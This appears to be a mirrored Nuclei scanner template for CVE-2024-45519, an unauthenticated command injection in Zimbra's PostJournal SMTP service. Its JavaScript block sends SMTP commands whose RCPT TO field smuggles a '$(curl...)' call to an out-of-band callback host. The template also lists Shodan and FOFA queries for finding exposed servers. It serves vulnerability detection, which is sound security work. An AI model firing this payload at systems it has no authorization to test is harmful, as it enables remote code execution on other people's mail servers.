admin/nuclei-templates
1
0
Fork 0
mirror of https://github.com/projectdiscovery/nuclei-templates.git synced 2026-02-04 09:43:40 +08:00
Code Issues Packages Projects Releases Wiki Activity
Files
ba03e54063a94de8155adf476dc07e5b39bca341
nuclei-templates/javascript/cves/2024/CVE-2024-45519.yaml
Prince Chaddha ea7a5969c8 Revert "chore: update TemplateMan 🤖" 
This reverts commit c31d574176.
2025-05-27 10:39:47 +08:00

64 lines
2.4 KiB
YAML
Raw Blame History

id: CVE-2024-45519
info:
name: Zimbra Collaboration Suite < 9.0.0 - Remote Code Execution
author: pdresearch,iamnoooob,parthmalhotra,ice3man543
severity: critical
description: |
SMTP-based vulnerability in the PostJournal service of Zimbra Collaboration Suite that allows unauthenticated attackers to inject arbitrary commands. This vulnerability arises due to improper sanitization of SMTP input, enabling attackers to craft malicious SMTP messages that execute commands under the Zimbra user context. Successful exploitation can lead to unauthorized access, privilege escalation, and potential compromise of the affected system's integrity and confidentiality.
reference:
- https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories
- https://blog.projectdiscovery.io/zimbra-remote-code-execution/
classification:
cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:*
metadata:
vendor: synacor
product: zimbra_collaboration_suite
shodan-query:
- http.title:"zimbra collaboration suite"
- http.title:"zimbra web client sign in"
- http.favicon.hash:1624375939
fofa-query:
- title="zimbra web client sign in"
- title="zimbra collaboration suite"
tags: cve,cve2024,rce,zimbra,kev
javascript:
- pre-condition: |
isPortOpen(Host,Port);
code: |
let m = require('nuclei/net');
let address = Host+":"+Port;
let conn;
conn= m.Open('tcp', address)
conn.Send('EHLO localhost\r\n');
conn.RecvString()
conn.Send('MAIL FROM: <aaaa@mail.domain.com>\r\n');
conn.RecvString()
conn.Send('RCPT TO: <"aabbb$(curl${IFS}'+oast+')"@mail.domain.com>\r\n');
conn.RecvString()
conn.Send('DATA\r\n');
conn.RecvString()
conn.Send('aaa\r\n');
conn.RecvString()
conn.Send('.\r\n');
resp = conn.RecvString()
conn.Send('QUIT\r\n');
conn.Close()
resp
args:
Host: "{{Host}}"
Port: 25
oast: "{{interactsh-url}}"
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
words:
- "message delivered"
# digest: 4b0a0048304602210093a556cdebf720a0d0f042e5537f3df1963a4bafa0c8b3248ebe3558f7aa028702210085b00219aec2bc653cdb680a73bec7450439d48782bd9ce6afe1ca26920f49c5:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink